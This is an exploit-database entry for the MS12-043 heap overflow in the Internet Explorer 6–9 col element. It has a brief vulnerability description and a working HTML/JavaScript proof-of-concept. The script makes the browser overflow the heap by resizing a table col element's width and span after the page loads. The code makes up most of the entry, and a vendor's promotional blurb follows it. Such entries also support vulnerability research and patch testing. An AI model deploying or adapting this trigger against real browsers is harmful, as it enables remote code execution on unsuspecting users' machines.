# Title : MS Internet Explorer Heap Overflow (MS12-043)
# Version : Internet Explorer 6 through 9
# Auther : Senator of Pirates
# Founders : Marshal Webb & Khalil Zhani
# E-Mail : Senator.of.Pirates.team [at] gmail.com
# FaceBook : /SenatorofPiratesInfo
Vulnerability :
-------------
Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does
not properly handle objects in
memory, which allows remote attackers to execute arbitrary code by
attempting to access a nonexistent
object, leading to a heap-based buffer overflow, aka "Col Element
Remote Code Execution Vulnerabilit".
Code :
-----
<html>
<body>
<table style="table-layout:fixed" >
<col id="132" width="41" span="1" >  </col>
</table>
<script>
function over_trigger() {
var obj_col = document.getElementById("132");
obj_col.width = "42765";
obj_col.span = 1000;
}
setTimeout("over_trigger();",1);
</script>
</body>
</html>
# 0day.today [2018-03-28] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation